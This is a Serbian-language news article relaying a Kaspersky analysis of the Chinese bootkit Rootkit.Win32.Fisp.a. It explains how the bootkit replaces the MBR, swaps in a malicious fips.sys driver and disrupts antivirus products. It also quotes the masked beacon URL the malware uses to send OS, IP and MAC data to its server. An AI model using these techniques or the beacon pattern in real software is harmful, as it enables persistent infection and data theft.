Novi kineski bootkit - Rootkit.Win32.Fisp.a

Opisi virusa, 12.04.2011, 09:27 AM

Novi kineski bootkit  - Rootkit.Win32.Fisp.a

Kaspersky Laboratorija identifikovala je novi štetni program - bootkit, kernel mod rootkit-a koji za sada pogađa samo kineske internet korisnike.

Bootkit nazvan Rootkit.Win32.Fisp.a se distribuira pomoću downloader Trojanca (Trojan-Downloader.NSIS.Agent.jd) koji kompjutere korisnika inficira kada pokušaju da preuzmu video snimak sa kineskog pornografskog sajta.

Među fajlovima koji se preuzimaju pomoću downloader Trojanca nalazi se i dropper Rootkit.Win32.Fisp, štetni fajl koji inficira boot sektor hard diska.

Bootkit snima stari MBR (master boot record) u trećem sektoru i zamenjuje ga sopstvenim. Počev od četvrtog sektora, on instalira enkriptovani drajver i ostatak koda (klikni na sliku radi uvećanja):

Fragment sa početka hard diska zaražen bootkit-om: Rootkit.Win32.Fisp.a

Kada se kompjuter startuje, štetni kod se izvršava i ponovo vraća originalni MBR kako bi se Windows učitao bez opasnosti od otkrivanja bootkit-a.

Kada je određeni deo sistema pokrenut, bootkit presreće funkciju ExVerifySuite. On tada zamenjuje sistemski drajver fips.sys štetnim drajverom koji se nalazi zapisan na početku hard diska u enkriptovanom obliku. Drajver fips.sys nije neophodan kako bi sistem funkcionisao normalno, tako da neće doći do pada sistema kada se ovaj drajver zameni štetnim drajverom.

Drajver detektuje brojne antivirusne programe i ometa ih u onome što bi inače trebalo da rade. Između ostalih, to se dešava AV programima proizvođača TrendMicro, BitDefender, AVG, Symantec, Kasperksy Lab, ESET i nekolicini kineskih programa.

Drajver kompromituje explorer.exe proces i ubacuje u računar varijantu bootkit-a koja takođe ima funkciju downloader-a. Štetni program šalje zahteve ka serveru i prenosi podatke o zaraženom kompjuterskom operativnom sistemu, IP adesi, MAC adresi itd., što izgleda ovako:

http://ab.*****.com:8081/tj.aspx?a=Windows XP Service Pack 2&b=192.168.0.16&c=00-00-00-00-00-00&f=

none&g=none&k=a&h=62&i=2&j=0321-01

Između ostalog, rootkit kasnije preuzima Trojan-Dropper.Win32.Vedio.dgs i Trojan-GameThief.Win32, keylogger koji krade podatke korisičkih naloga online igrice LineAge2.

Šematski prikaz infekcije


Prijavite se na našu mailing listu i primajte najnovije vesti (jednom dnevno) putem emaila svakog radnog dana besplatno:

Izdvojeno

Novi trojanac BloodyStealer krade Epic Games i Steam naloge

Novi trojanac BloodyStealer krade Epic Games i Steam naloge

Novi trojanac koji se prodaje na ruskim hakerskim forumima onima koji ga kupe nudi mogućnost krađe korisničkih naloga na popularnim servisima kao ... Dalje

Opasni bankarski trojanac u Google oglasima u rezultatima pretrage

Opasni bankarski trojanac u Google oglasima u rezultatima pretrage

Ako na pretraživačima poput Googlea tražite softver TeamViewer mogli biste naleteti na linkove koji bi vas mogli odvesti do lažnih sajtova na koji... Dalje

Nova varijanta malvera AdLoad prolazi neprimećena Appleovu XProtect odbranu od malvera

Nova varijanta malvera AdLoad prolazi neprimećena Appleovu XProtect odbranu od malvera

Nova varijanta malvera AdLoad provlači se kroz Appleovu ugrađenu antivirusnu tehnologiju XProtect i inficira Mac računare u okviru više kampanja k... Dalje

Novi trojanac FatalRAT širi se preko Telegrama

Novi trojanac FatalRAT širi se preko Telegrama

Sajber kriminalci koriste Telegram kanale da bi širili novog trojanca koji im omogućava daljinski pristup inficiranim uređajima (RAT). Istraživač... Dalje

Microsoft upozorio na malver LemonDuck koji inficira i Windows i Linux

Microsoft upozorio na malver LemonDuck koji inficira i Windows i Linux

LemonDuck je prvi put otkriven u Kini 2019. godine kao botnet koji je inficirane sisteme koristio za rudarenje kriptovalute Monero. Međutim, on je u ... Dalje